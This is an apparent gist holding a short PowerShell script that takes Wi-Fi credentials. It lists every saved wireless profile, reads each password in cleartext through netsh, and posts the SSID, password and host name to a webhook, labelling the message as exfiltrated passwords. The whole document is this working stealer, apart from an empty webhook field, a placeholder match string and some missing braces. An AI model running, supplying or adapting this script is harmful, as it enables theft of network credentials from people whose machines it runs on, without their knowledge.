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Created September 23, 2023 21:26
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#Insert your webhook here
$webhookUri = ''
#Get List of SSIDS
$SSIDS = (netsh wlan show profiles | Select-String ': ' ) -replace ".*:\s+"
#A loop to get password for each SSID
$WifiInfo = foreach($SSID in $SSIDS) {
$Password = (netsh wlan show profiles name=$SSID key=clear | Select-String '{LANG VALUE}') -replace ".*:\s+"
New-Object -TypeName psobject -Property @{"SSID"=$SSID;"Password"=$Password}
#Creating the body of your message
$Body = @{
'username' = 'Agent'
'content' = 'Wifi passwords exfiltrated from : ' + ' ' + $env:computername + ' Network : ' + $SSID + ' ' + ' Password : ' + $Password
#Send your data using REST method
Invoke-RestMethod -Uri $webhookUri -Method 'post' -Body $Body
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